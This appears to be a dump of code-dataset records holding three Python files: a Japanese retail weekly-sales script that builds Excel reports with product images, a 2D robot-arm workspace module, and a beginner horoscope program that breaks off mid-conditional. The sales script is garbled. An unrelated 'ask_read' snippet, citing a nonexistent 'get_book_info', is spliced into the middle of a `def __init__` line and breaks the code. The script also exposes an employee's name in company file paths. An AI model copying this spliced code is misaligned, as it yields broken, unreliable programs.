FUNイオンモール大高\",\"大高\"],\n [\"01001043 FUNららぽーと愛知東郷\",\"東郷町\"],\n [\"01001044 FUNイオンモール太田\",\"太田\"],\n [\"01001045 FUNイオンモール水戸内原\",\"水戸\"],\n [\"01001046 FUNららぽーとEXPOCITY\",\"EXPO\"],\n [\"01001047 FUNラゾーナ川崎プラザ\",\"川崎\"],\n [\"01001048 FUNららぽーと新三郷\",\"新三郷\"],\n [\"01001049 FUNイオンモール幕張新都心\",\"幕張\"],\n [\"01001050 FUNイオンモール各務原\",\"各務原\"],\n [\"01001051 FUNららぽーと堺\",\"堺\"],\n \n]\n\ndr_files = 'C:/Users/古内翔平/OneDrive - 株式会社 TRINITY /業務会議/4⃣販売部/古内/analysis/data_folder'#今週実績\ndr_files2 = 'C:/Users/古内翔平/OneDrive - 株式会社 TRINITY /業務会議/4⃣販売部/古内/analysis/previous_data'#過去実績\ndr_files3 = 'C:/Users/古内翔平/OneDrive - 株式会社 TRINITY /業務会議/4⃣販売部/古内/analysis/sales_values'#売上集計\n\ndr_read = os.listdir(dr_files)\ndr_read2 = os.listdir(dr_files2)\ndr_read3 = os.listdir(dr_files3)\n\n\n\n#out_put_file = \"C:/Users/fun-f/Desktop/analysis/画像テスト.xlsx\"\nselectfile = os.listdir(\"C:/Users/古内翔平/OneDrive - 株式会社 TRINITY /業務会議/4⃣販売部/古内/analysis/create_file/\")\nout_put_file = os.path.join(\"C:/Users/古内翔平/OneDrive - 株式会社 TRINITY /業務会議/4⃣販売部/古内/analysis/create_file/\",selectfile[0])\n\nimg_stock = \"C:/Users/古内翔平/OneDrive - 株式会社 TRINITY /業務会議/4⃣販売部/古内/analysis/item_image_stock\"\nimg_stock_list = os.listdir(img_stock)\n\n#入荷情報リストを作成\n#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n\n#フォルダーパス\nnew_arrival_path = \"C:/Users/古内翔平/OneDrive - 株式会社 TRINITY /業務会議/4⃣販売部/古内/analysis/new_arrival/\"\n\nnew_arrival_file = os.listdir(new_arrival_path)\nprint(new_arrival_file)\n\ncol_list = [\n \"B\",\"F\",\"J\",\"N\",\"R\",\"V\"\n]\n\nwb = pyxl.load_workbook(os.path.join(new_arrival_path,new_arrival_file[1]))\n#wb = pyxl.load_workbook(\"C:/Users/fun-f/Desktop/analysis/new_arrival/入荷予定MAP_20221115183651_1.xlsx\")\n\nsheet_name = wb.sheetnames\n#sheet_count = len(sheet_name)\n\nproject_list = []\nindex_num = [16,39,62,85,108,131,154]#85,108,131\n\nfor sheet_n in sheet_name:\n ws = wb[sheet_n]\n \n class Items:\n \n def 
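# Sketch of a stricter variant of the read prompt in get_book_info above;
# the original's own comment asks "could check for valid input here?", so
# this loops until an explicit 'y' or 'n' (illustrative only):
def ask_read():
    while True:
        answer = input("Have you read this book (y/n): ").strip().lower()
        if answer in ("y", "n"):
            return 1 if answer == "y" else 0
        print("Please answer 'y' or 'n'")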
__init__(self, name, item_cd, category_cd , producttion_number ,size):\n \n #商品名\n self.name = name\n #商品CD\n self.item_cd = item_cd\n #アイテムCD\n self.category_cd = category_cd\n #生産枚数\n self.producttion_number = producttion_number\n #サイズ\n self.size = size\n \n for index_x in index_num: \n \n for c_no in range(0,6):\n print(c_no) \n Items.name = ws[col_list[c_no] + str(index_x + 1)].value\n Items.item_cd = ws[col_list[c_no] + str(index_x)].value\n Items.category_cd = str(ws[col_list[c_no] + str(index_x)].value)[2:4]\n Items.producttion_number = ws[col_list[c_no] + str(index_x + 2)].value\n Items.size = ws[col_list[c_no] + str(index_x + 4)].value\n \n data_RC = pd.DataFrame({\"商品名\":[Items.name],\"商品CD\":[Items.item_cd],\"アイテムCD\":[Items.category_cd],\"生産枚数\":[Items.producttion_number],\"サイズ\":[Items.size]})\n \n if Items.name == None :\n print(\"None\")\n \n else: \n project_list.append(data_RC)\n \nnew_arrival_list = pd.DataFrame(pd.concat(project_list,axis=0))\n#print(new_arrival_list)\nsort_list = new_arrival_list.sort_values(\"生産枚数\",ascending=False)\n\nitem_cd_uniq = np.unique(sort_list[\"アイテムCD\"].values)\nprint(item_cd_uniq)\n\n#カテゴリー生産総枚数順に優先順位を設定\n\nproduction_rank_list = []\nfor item_n in item_cd_uniq:\n key_item = sort_list[sort_list[\"アイテムCD\"] == item_n]\n category_number = sum(key_item[\"生産枚数\"].values)\n print(category_number)\n \n data_index = pd.DataFrame({\"アイテムCD\":[item_n],\"生産枚数\":[category_number]})\n production_rank_list.append(data_index)\n \nranking_list = pd.concat(production_rank_list,axis=0).sort_values(\"生産枚数\",ascending=False).head(4) \n\nprint(ranking_list)\n\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\nitem_category_dic = {\n \"01\":\"OP\",\n \"02\":\"CD\",\n \"03\":\"JK\",\n \"04\":\"KT\",\n \"05\":\"CS\",\n \"06\":\"CT\",\n \"07\":\"BL\",\n \"08\":\"SK\",\n \"09\":\"PT\",\n \"10\":\"TR\",\n \"11\":\"INN\",\n \"12\":\"SETUP\",\n \"13\":\"ACC\",\n \"15\":\"SHOES\",\n }\n\nimg_columns1_1 = [\"S45\"]\nimg_columns2_1 = [\"AK45\"]\nimg_columns3_1 = [\"S57\"]\nimg_columns4_1 = [\"AK57\"]\n\nimg_theme = [img_columns1_1,img_columns2_1,img_columns3_1,img_columns4_1]\n\nimg_columns1 = [\"U\",\"Y\",\"AC\",\"AG\",]\nimg_columns2 = [\"AN\",\"AR\",\"AV\",\"AZ\"]\n\nimg_columns3 = [\"U\",\"Y\",\"AC\",\"AG\",]\nimg_columns4 = [\"AN\",\"AR\",\"AV\",\"AZ\"]\n \nimg_columns = [img_columns1,img_columns2,img_columns3,img_columns4] \n\nimg_index1 = [42,43,44,52,53]\nimg_index2 = [42,43,44,52,53]\nimg_index3 = [54,55,56,65,66]\nimg_index4 = [54,55,56,65,66]\n\nimg_index_list = [img_index1,img_index2,img_index3,img_index4]\n\nbest_col = [\"T\",\"W\",\"Z\",\"AC\",\"AF\",\"AI\",\"AL\",\"AO\",\"AR\",\"AU\",\"AX\",\"BA\"]\n\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#店別ベスト作成\n\ndata_concat_list = []\n \nfor select_i in tenpo:\n \n shop_i = select_i\n \n \n week2 = pd.read_csv('C:/Users/古内翔平/OneDrive - 株式会社 TRINITY /業務会議/4⃣販売部/古内/analysis/data_folder/' + str(shop_i[1]) + \".csv\",encoding='cp932')#ok\n \n df_week1 = pd.DataFrame(week2)\n\n print(df_week1)\n\n item_cd = pd.DataFrame(df_week1[\"商品コード\"].astype('str').str.zfill(10).values,columns=[\"商品CD\"])\n item_name = pd.DataFrame(df_week1[\"商品名\"].values,columns=[\"商品名\"])\n category_cd = pd.DataFrame(df_week1[\"商品コード\"].astype('str').str.zfill(10).str[2:4].values,columns=[\"アイテムCD\"])\n quantity = pd.DataFrame(df_week1['合計数量'].values,columns=[\"数量\"])\n amount = pd.DataFrame(df_week1['合計金額'].values,columns=[\"金額\"])\n #shop_name = pd.DataFrame([shop_i[2]],columns=[\"店舗\"])\n\n df_week1_values = 
pd.concat([item_cd,item_name,category_cd,quantity,amount],axis=1)\n\n filter1_df_week1_values = df_week1_values[df_week1_values[\"アイテムCD\"] != \"98\" ]\n\n filter2_df_week1_values = filter1_df_week1_values[(filter1_df_week1_values[\"商品名\"] != \"キレイマスク\") & (filter1_df_week1_values[\"商品名\"] != \"サンプル\") ]\n \n filter2_df_week1_values2 = pd.DataFrame(filter2_df_week1_values)\n \n sort_filter2_df_week1_values2 = filter2_df_week1_values2.sort_values(\"数量\",ascending=False)#★★★ 修正 ★★★\n #sort_filter2_df_week1_values3 = filter2_df_week1_values2.sort_values(\"金額\",ascending=False)#★★★ 修正 ★★★\n \n for low_data in sort_filter2_df_week1_values2.values :#★★★ 修正 ★★★\n item_cd = pd.DataFrame([low_data[0]],columns=[\"商品CD\"])\n item_name = pd.DataFrame([low_data[1]],columns=[\"商品名\"])\n category_cd = pd.DataFrame([low_data[2]],columns=[\"アイテムCD\"])\n quantity = pd.DataFrame([low_data[3]],columns=[\"数量\"])\n amount = pd.DataFrame([low_data[4]],columns=[\"金額\"])\n shop_name = pd.DataFrame([shop_i[1]],columns=[\"店舗\"])\n \n low_data2 = pd.concat([item_cd,item_name,category_cd,quantity,amount,shop_name],axis=1)\n \n data_concat_list.append(low_data2)\n \n\n all_amount = sum(filter2_df_week1_values[\"金額\"].values)\n\n op_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"01\"]\n op_1_amount = sum(op_1[\"金額\"].values)\n try :\n op_1_ratio = op_1_amount / all_amount \n \n except ZeroDivisionError:\n \n op_1_ratio = 0\n \n op_list = [op_1_amount,op_1_ratio]\n\n cd_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"02\"]\n cd_1_amount = sum(cd_1[\"金額\"].values)\n \n try:\n cd_1_ratio = cd_1_amount / all_amount \n \n except ZeroDivisionError:\n cd_1_ratio = 0\n \n cd_list = [cd_1_amount,cd_1_ratio]\n \n \n jk_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"03\"]\n jk_1_amount = sum(jk_1[\"金額\"].values)\n try:\n jk_1_ratio = jk_1_amount / all_amount \n \n except ZeroDivisionError:\n jk_1_ratio = 0\n \n jk_list = [jk_1_amount,jk_1_ratio]\n\n kt_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"04\"]\n kt_1_amount = sum(kt_1[\"金額\"].values)\n \n try :\n kt_1_ratio = kt_1_amount / all_amount \n \n except ZeroDivisionError:\n kt_1_ratio = 0\n \n kt_list = [kt_1_amount,kt_1_ratio]\n\n cs_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"05\"]\n cs_1_amount = sum(cs_1[\"金額\"].values)\n \n try :\n cs_1_ratio = cs_1_amount / all_amount \n \n except ZeroDivisionError:\n cs_1_ratio = 0\n \n cs_list = [cs_1_amount,cs_1_ratio]\n\n ct_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"06\"]\n ct_1_amount = sum(ct_1[\"金額\"].values)\n \n try:\n ct_1_ratio = ct_1_amount / all_amount \n \n except ZeroDivisionError:\n ct_1_ratio = 0\n \n ct_list = [ct_1_amount,ct_1_ratio]\n\n bl_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"07\"]\n bl_1_amount = sum(bl_1[\"金額\"].values)\n \n try :\n bl_1_ratio = bl_1_amount / all_amount \n \n except ZeroDivisionError :\n bl_1_ratio = 0\n \n bl_list = [bl_1_amount,bl_1_ratio]\n\n sk_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"08\"]\n sk_1_amount = sum(sk_1[\"金額\"].values)\n \n try :\n sk_1_ratio = sk_1_amount / all_amount \n \n except ZeroDivisionError:\n sk_1_ratio = 0\n \n sk_list = [sk_1_amount,sk_1_ratio]\n\n pt_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"09\"]\n pt_1_amount = sum(pt_1[\"金額\"].values)\n \n try :\n pt_1_ratio = pt_1_amount / all_amount \n \n except ZeroDivisionError:\n pt_1_ratio = 0\n \n pt_list 
= [pt_1_amount,pt_1_ratio]\n\n tr_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"10\"]\n tr_1_amount = sum(tr_1[\"金額\"].values)\n \n try :\n tr_1_ratio = tr_1_amount / all_amount \n \n except ZeroDivisionError:\n \n tr_1_ratio = 0\n \n tr_list = [tr_1_amount,tr_1_ratio]\n\n inn_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"11\"]\n inn_1_amount = sum(inn_1[\"金額\"].values)\n \n try:\n inn_1_ratio = inn_1_amount / all_amount \n \n except ZeroDivisionError:\n inn_1_ratio = 0\n \n inn_list = [inn_1_amount,inn_1_ratio]\n\n setup_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"12\"]\n setup_1_amount = sum(setup_1[\"金額\"].values)\n \n try:\n setup_1_ratio = setup_1_amount / all_amount\n \n except ZeroDivisionError:\n setup_1_ratio = 0\n \n setup_list = [setup_1_amount,setup_1_ratio]\n\n acc_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"13\"]\n acc_1_amount = sum(acc_1[\"金額\"].values)\n \n try:\n acc_1_ratio = acc_1_amount / all_amount\n \n except ZeroDivisionError:\n \n acc_1_ratio = 0\n \n acc_list = [acc_1_amount,acc_1_ratio]\n \n \n sh_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"15\"]\n sh_1_amount = sum(sh_1[\"金額\"].values)\n \n try:\n sh_1_ratio = sh_1_amount / all_amount\n \n except ZeroDivisionError:\n \n sh_1_ratio = 0\n \n sh_list = [sh_1_amount,sh_1_ratio]\n\n out_put_list = [\n \n op_list,\n cd_list,\n jk_list,\n kt_list,\n cs_list,\n ct_list,\n bl_list,\n sk_list,\n pt_list,\n tr_list,\n inn_list,\n setup_list,\n acc_list,\n sh_list\n \n ]\n \n print(all_amount)\n\n\n \nprint(data_concat_list) \n\n#data_concat_list2 = pd.DataFrame([data_concat_list])\n\ntry :\n\n df_data_concat_list = pd.concat(data_concat_list,axis=0)\n \nexcept ValueError: \n \n item_cd = pd.DataFrame([\"\"],columns=[\"商品CD\"])\n item_name = pd.DataFrame([\"\"],columns=[\"商品名\"])\n category_cd = pd.DataFrame([\"\"],columns=[\"アイテムCD\"])\n quantity = pd.DataFrame([0],columns=[\"数量\"])\n amount = pd.DataFrame([0],columns=[\"金額\"])\n shop_name = pd.DataFrame([\"\"],columns=[\"店舗\"])\n \n low_data2 = pd.concat([item_cd,item_name,category_cd,quantity,amount,shop_name],axis=1)\n \n data_concat_list.append(low_data2)\n \n \n \n df_data_concat_list = pd.concat(data_concat_list,axis=0)\n \n \n \nprint(df_data_concat_list)\n\n\n\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#追加ここまで\n\nwb_out = pyxl.load_workbook(out_put_file)\n\nfor sheet_name in tenpo:\n ws_out = wb_out[sheet_name[1]] \n\n best_key = df_data_concat_list[df_data_concat_list[\"店舗\"] == sheet_name[1]].sort_values(\"金額\",ascending=False).head(12)\n\n for best_n,no_ in zip(best_key.values,range(0,13)):\n best_target = best_n[0]\n i_name = best_n[1]\n i_sales = best_n[4]\n ws_out[best_col[no_] + str(4)] = i_name\n ws_out[best_col[no_] + str(5)] = i_sales\n \n \n for img_x in img_stock_list:\n base,ext = splitext(img_x)\n \n if str(base) == str(best_target) :\n \n t_path = img_stock + \"/\" + img_x\n\n img = Image.open(t_path)\n \n re_img = img.resize((420, 600))\n \n re_img.save(t_path)\n \n best_pasting_img = pyxl.drawing.image.Image(t_path)\n \n best_pasting_img.anchor = str(best_col[no_] + str(6))#画像挿入\n \n ws_out.add_image(best_pasting_img)\n \n\n for rank_n,counter in zip(ranking_list.values,range(0,4)):\n\n \n key_2 = sort_list[sort_list[\"アイテムCD\"] == rank_n[0]].head(4)\n counter_2 = len(key_2[\"商品名\"].values)\n print(counter_2)\n ws_out[img_theme[counter][0]].value = item_category_dic[rank_n[0]]\n \n row_counter = 0\n for 
out_data in key_2.values:\n \n print(out_data)\n ws_out[img_columns[counter][row_counter ] + str(img_index_list[counter][0])].value = out_data[1]#product code\n ws_out[img_columns[counter][row_counter ] + str(img_index_list[counter][1])].value = out_data[0]#product name\n ws_out[img_columns[counter][row_counter ] + str(img_index_list[counter][4])].value = out_data[3]#quantity\n ws_out[img_columns[counter][row_counter ] + str(img_index_list[counter][3])].value = out_data[4]#amount\n target = out_data[1]\n \n\n for img_x in img_stock_list:\n base,ext = splitext(img_x)\n \n if str(base) == str(target) :\n \n t_path = img_stock + \"/\" + img_x\n\n img = Image.open(t_path)\n \n re_img = img.resize((560, 750))\n \n re_img.save(t_path)\n \n pasting_img = pyxl.drawing.image.Image(t_path)\n \n pasting_img.anchor = str(img_columns[counter][row_counter ] + str(img_index_list[counter][2]))#insert the image\n \n ws_out.add_image(pasting_img)\n \n row_counter += 1\n \nwb_out.save(out_put_file)\n#wb_out.save(os.path.join(\"C:/Users/fun-f/Desktop/analysis\",\"週間分析1.xlsx\")) \n \n \n#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n \n \n \n\n\n#img_stock = \"C:/Users/fun-f/Desktop/analysis/item_image_stock\"\n#img_stock_list = os.listdir(img_stock)\n\n#target = \"1105050180\"\n\n#for img_x in img_stock_list:\n #base,ext = splitext(img_x)\n #print(img_x)\n \n #if base == target :\n #print(\"target\",img_x)\n #t_path = img_stock + \"/\" + img_x\n\n #img = Image.open(t_path)\n \n\n \n #width = 20#19.32\n \n #height = int(img.height * width / img.width)\n \n #re_img = img.resize((width, height))\n #re_img = img.resize((610, 780))\n \n #re_img.save(t_path)\n \n #pasting_img = pyxl.drawing.image.Image(t_path)\n #pasting_img.anchor = \"B8\"\n #pasting_img.anchor = \"U56\"\n \n #ws_out.add_image(pasting_img)\n \n#wb_out.save(os.path.join(\"C:/Users/fun-f/Desktop/analysis\",\"週間分析1.xlsx\"))","repo_name":"ShouheiFuruuchi/python_space","sub_path":"weekly_analysis2/parts/parts_39_1.py","file_name":"parts_39_1.py","file_ext":"py","file_size_in_byte":16901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21792134838","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom arm.obstacle import Obstacle\nfrom arm.goal import GoalEndPose, GoalCollection\nfrom frame2d import Frame2D\n\nclass Box(object):\n\n    BOX_SIZE = 0.4\n\n    def __init__(self, x, y, theta=0, name=\"box\"):\n        self.obstacle = Obstacle(Frame2D(theta, x, y), Box.BOX_SIZE, Box.BOX_SIZE)\n        self.frame = self.obstacle.frame\n        \n        ## Names are used to map between workspace and planning domain\n        self.name = name\n\n    ## Deprecated: use get_grasp_goal() instead\n    def get_grasp_poses(self):\n        return self.get_grasp_goal()\n\n    def get_grasp_goal(self):\n        goals = []\n        p1 = self.obstacle.frame.transform_points(np.array([0, Box.BOX_SIZE/2]))\n        theta1 = -np.pi/2 + self.obstacle.frame.theta()\n        goals.append(GoalEndPose(np.array([p1[0,0], p1[0,1], theta1]), 0.1))\n        \n        p2 = self.obstacle.frame.transform_points(np.array([0, -Box.BOX_SIZE/2]))\n        theta2 = np.pi/2 + self.obstacle.frame.theta()\n        goals.append(GoalEndPose(np.array([p2[0,0], p2[0,1], theta2]), 0.1))\n\n        p3 = self.obstacle.frame.transform_points(np.array([Box.BOX_SIZE/2, 0]))\n        theta3 = np.pi + self.obstacle.frame.theta()\n        goals.append(GoalEndPose(np.array([p3[0,0], p3[0,1], theta3]), 0.1))\n        \n        p4 = self.obstacle.frame.transform_points(np.array([-Box.BOX_SIZE/2, 0]))\n        theta4 = self.obstacle.frame.theta()\n        goals.append(GoalEndPose(np.array([p4[0,0], p4[0,1], theta4]), 0.1))\n        \n        return 
GoalCollection(goals)\n\n    def get_collider(self):\n        return self.obstacle.get_collider()\n\n    def get_position(self):\n        return self.obstacle.frame.origin()\n\n    def draw(self, ax, color='blue', clear=True):\n        self.obstacle.draw(ax, color=color, clear=clear)\n\n    def draw_grasp_poses(self, ax):\n        origin = self.get_position()\n        grasp_poses = self.get_grasp_poses()\n        for pose in grasp_poses:\n            ax.plot([origin[0], pose[0]], [origin[1], pose[1]])\n            ax.scatter(pose[0], pose[1])\n\nclass Area(object):\n    def __init__(self, x, y, width, height, name):\n        self.x = x\n        self.y = y\n        self.width = width\n        self.height = height\n        self.obstacle = Obstacle(Frame2D(0, x, y), width, height)\n        self.frame = self.obstacle.frame\n        self.name = name\n\n    def get_collider(self):\n        return self.obstacle.get_collider()\n\n    def get_bounding_box(self):\n        return [\n            self.x - self.width/2,\n            self.x + self.width/2,\n            self.y - self.height/2,\n            self.y + self.height/2\n        ]\n\n    def draw(self, ax, color='#22CC22', clear=True):\n        self.obstacle.draw(ax, color=color, clear=clear)\n\nclass Workspace(object):\n\n    WIDTH = 10\n    HEIGHT = 10\n\n    def __init__(self):\n        self.boxes = []\n        self.obstacles = []\n        self.areas = []\n        self.arm = None\n        self.arm_holding = None\n\n    def add_box(self, x, y, theta=0, name=None):\n        if name is None:\n            name = \"box{0}\".format(len(self.boxes))\n\n        b = Box(x, y, theta, name)\n        self.boxes.append(b)\n\n    def add_obstacle(self, obstacle):\n        self.obstacles.append(obstacle)\n\n    def add_area(self, area, name=None):\n        if name is None:\n            name = \"area{0}\".format(len(self.areas))\n\n        self.areas.append(area)\n\n    def create_area(self, x, y, width, height):\n        name = \"area{0}\".format(len(self.areas))\n        area = Area(x, y, width, height, name)\n        self.areas.append(area)\n        return area\n\n    def add_arm(self, arm):\n        self.arm = arm\n\n    def in_collision(self):\n        if self.arm is not None:\n            for o in self.obstacles:\n                if self.arm.collides(o.get_collider()):\n                    return True\n            for o in self.boxes:\n                if self.arm.collides(o.get_collider()):\n                    return True\n\n        return False\n\n    def box_at(self, x, y):\n        for b in self.boxes:\n            if b.obstacle.point_collides(x, y):\n                return b\n\n        return None\n\n    def area_at(self, x, y):\n        for a in self.areas:\n            if a.obstacle.point_collides(x, y):\n                return a\n\n        return None\n\n    def arm_grab(self, box):\n        self.boxes.remove(box)\n        self.arm.grab(box)\n\n    def arm_drop(self):\n        box = self.arm.drop()\n        if box is not None:\n            self.boxes.append(box)\n\n    def draw(self, ax=None, t=0):\n        own_fig = ax is None\n        if own_fig:\n            fig, ax = plt.subplots(figsize=(10,6))\n            #fig.canvas.mpl_connect('close_event', handle_close)\n            ax.set_aspect('equal')\n            ax.set_xlim(-5, 5)\n            ax.set_ylim(0, 8)\n\n        for a in self.areas:\n            a.draw(ax)\n\n        for o in self.obstacles:\n            o.draw(ax, color='#FF5555')\n\n        for b in self.boxes:\n            b.draw(ax, color='blue')\n\n        if self.arm is not None:\n            self.arm.draw(ax)\n\n        if own_fig:\n            plt.show()\n\n        if t > 0:\n            plt.pause(t)\n\n    def draw_frame(self, ax, dt):\n        if self.arm is not None:\n            self.arm.draw(ax)\n\n        for o in self.obstacles:\n            o.draw(ax)\n\n        for b in self.boxes:\n            b.draw(ax)\n","repo_name":"geinarm/cmsc818_gudjon","sub_path":"workspace.py","file_name":"workspace.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"19637627663","text":"# Horoscope fortune teller game\r\n# import random\r\nstrengths = \"\"\r\nweaknesses = \"\"\r\n\r\n\r\n# -------------------------------------------- \r\n\r\n\t# You've just learned about variables and conditionals.\r\n\t# Just from knowing those 
two topics, you can do so much!\r\n\t\r\n\t# Let's try to make a simple program that responds to the user.\r\n\t# We're going to recreate the Magic 8 Ball!!!\r\n\t\t\t\r\n\t\t\t# Never heard of it? That's ok!\r\n\r\n\t\t\t\t\t# You got this!\r\n\r\n # -------------------------------------------- \r\n\r\n\t# How a Magic 8 Ball Works:\r\n\r\n\t# The user asks a question and vigorously shakes the ball. \r\n\t# Then the ball will respond with one of twenty responses, chosen at random. \r\n\r\n\t# That's pretty simple right?\r\n\r\n # -------------------------------------------- \r\n\r\n\t# Part 1: \r\n\t# Print instructions on the screen and \r\n\t# prompt the user to ask a question\r\n\r\n\t\r\n\r\n # --------------------------------------------\r\n# we are making a horoscope fortune teller\r\n\r\n#Aquarius\r\nAquariusStr=\"Progressive, original, independent, humanitarian\"\r\nAquariusWe=\"Runs from emotional expression, temperamental, uncompromising, aloof\"\r\n\r\n\r\n#Pisces\r\nPiscesStr=\"Compassionate, artistic, intuitive, gentle, wise, musical\"\r\nPiscesWe=\"Fearful, overly trusting, sad, desire to escape reality, can be a victim or a martyr\"\r\n\r\n\r\n#ARIES\r\nAriesStr=\"Courageous, determined, confident, enthusiastic, optimistic, honest, passionate\"\r\nAriesWe=\"Impatient, moody, short-tempered, impulsive, aggressive\"\r\n\r\n\r\n#Taurus\r\nTaurusStr=\"Reliable, patient, practical, devoted, responsible, stable\"\r\nTaurusWe=\"Stubborn, possessive, uncompromising\"\r\n\r\n\r\n#Gemini Traits\r\nGeminiStr =\"Gentle, affectionate, curious, adaptable, ability to learn quickly and exchange ideas\"\r\nGeminiWe =\"Nervous, inconsistent, indecisive\"\r\n\r\n\r\n#Cancer Traits\r\nCancerStr =\"Tenacious, highly imaginative, loyal, emotional, sympathetic, persuasive\"\r\nCancerWe =\"Moody, pessimistic, suspicious, manipulative, insecure\"\r\n\r\n\r\n# Leo Traits\r\nLeoStr =\"Creative, passionate, generous, warm-hearted, cheerful, humorous\"\r\nLeoWe= \"Arrogant, stubborn, self-centered, lazy, inflexible\"\r\n\r\n\r\n# Virgo Traits\r\nVirgoStr= \"Loyal, analytical, kind, hardworking, practical\"\r\nVirgoWe=\"Shyness, worry, overly critical of self and others, all work and no play\"\r\n\r\n\r\n# Libra Traits\r\nLibraStr= \"Cooperative, diplomatic, gracious, fair-minded, social\"\r\nLibraWe= \"Indecisive, avoids confrontations, will carry a grudge, self-pity\"\r\n\r\n\r\n# Scorpio Traits\r\nScorpioStr = \"Resourceful, powerful, brave, passionate, a true friend\"\r\nScorpioWe = \"Distrusting, jealous, manipulative, violent\"\r\n\r\n\r\n# Sagittarius Traits\r\nSagittariusStr = \"Generous, idealistic, great sense of humor\"\r\nSagittariusWe = \"Promises more than can deliver, very impatient, will say anything no matter how undiplomatic\"\r\n\r\n\r\n# Capricorn Traits\r\nCapricornStr = \"Responsible, disciplined, self-control, good managers\"\r\n\r\nCapricornWe = \"Know-it-all, unforgiving, condescending, expecting the worst\"\r\n\r\n\r\nprint(\"Do you want to find out your horoscope?\\nInput your birthday month:\")\r\n\r\nuser_month = input()\r\nuser_month = str(user_month)\r\nprint(\"Now input the day of the month you were born in:\")\r\n\r\nuser_day = input()\r\nuser_day = int(user_day)\r\n# conditionals for the horoscope signs\r\n# Aries (March 21 – April 19)\r\n# Taurus (April 20 – May 20)\r\n# Gemini (May 21 – June 20)\r\n# Cancer (June 21 – July 22)\r\n# Leo (July 23 – August 22)\r\n# Virgo (August 23 – September 22)\r\n# Libra (September 23 – October 22)\r\n# Scorpio (October 23 – November 21)\r\n# Sagittarius (November 22 – December 21)\r\n# Capricorn (December 22 – January 19)\r\n# Aquarius (January 20 – February 18)\r\n# Pisces (February 19 – March 20)\r\nastrology_sign = \"\"\r\n# 
determining the astrology sign\r\n\r\n# January to June\r\n\r\nif user_month == \"January\" and user_day <= 19:\r\n    astrology_sign = \"Capricorn\"\r\n    strengths = CapricornStr\r\n    weaknesses = CapricornWe\r\nelif user_month == \"January\" and user_day >= 20:\r\n    astrology_sign = \"Aquarius\"\r\n    strengths = AquariusStr\r\n    weaknesses = AquariusWe\r\nelif user_month == \"February\" and user_day <= 18:\r\n    astrology_sign = \"Aquarius\"\r\n    strengths = AquariusStr\r\n    weaknesses = AquariusWe\r\nelif user_month == \"February\" and user_day >= 19:\r\n    astrology_sign = \"Pisces\"\r\n    strengths = PiscesStr\r\n    weaknesses = PiscesWe\r\nelif user_month == \"March\" and user_day <= 20:\r\n    astrology_sign = \"Pisces\"\r\n    strengths = PiscesStr\r\n    weaknesses = PiscesWe\r\nelif user_month == \"March\" and user_day >= 21:\r\n    astrology_sign = \"Aries\" \r\n    strengths = AriesStr\r\n    weaknesses = AriesWe\r\nelif user_month == \"April\" and user_day <= 19:\r\n    astrology_sign = \"Aries\" \r\n    strengths = AriesStr\r\n    weaknesses = AriesWe\r\nelif user_month == \"April\" and user_day >= 20:\r\n    astrology_sign = \"Taurus\"\r\n    strengths = TaurusStr\r\n    weaknesses = TaurusWe\r\nelif user_month == \"May\" and user_day <= 20:\r\n    astrology_sign = \"Taurus\"\r\n    strengths = TaurusStr\r\n    weaknesses = TaurusWe \r\nelif user_month == \"May\" and user_day >= 21:\r\n    astrology_sign = \"Gemini\"\r\n    strengths = GeminiStr\r\n    weaknesses = GeminiWe\r\nelif user_month == \"June\" and user_day <= 20:\r\n    astrology_sign = \"Gemini\"\r\n    strengths = GeminiStr\r\n    weaknesses = GeminiWe\r\nelif user_month == \"June\" and user_day >= 21:\r\n    astrology_sign = \"Cancer\"\r\n    strengths = CancerStr\r\n    weaknesses = CancerWe\r\nelif user_month == \"July\" and user_day <= 22:\r\n    astrology_sign = \"Cancer\"\r\n    strengths = CancerStr\r\n    weaknesses = CancerWe\r\nelif user_month == \"July\" and user_day >= 23: \r\n    astrology_sign = \"Leo\"\r\n    strengths = LeoStr\r\n    weaknesses = LeoWe\r\nelif user_month == \"August\" and user_day <= 22: \r\n    astrology_sign = \"Leo\"\r\n    strengths = LeoStr\r\n    weaknesses = LeoWe\r\nelif user_month == \"August\" and user_day >= 23: \r\n    astrology_sign = \"Virgo\"\r\n    strengths = VirgoStr\r\n    weaknesses = VirgoWe\r\nelif user_month == \"September\" and user_day <= 22:\r\n    astrology_sign = \"Virgo\"\r\n    strengths = VirgoStr\r\n    weaknesses = VirgoWe\r\nelif user_month == \"September\" and user_day >= 23:\r\n    astrology_sign = \"Libra\"\r\n    strengths = LibraStr\r\n    weaknesses = LibraWe\r\nelif user_month == \"October\" and user_day <= 22:\r\n    astrology_sign = \"Libra\"\r\n    strengths = LibraStr\r\n    weaknesses = LibraWe\r\nelif user_month == \"October\" and user_day >= 23:\r\n    astrology_sign = 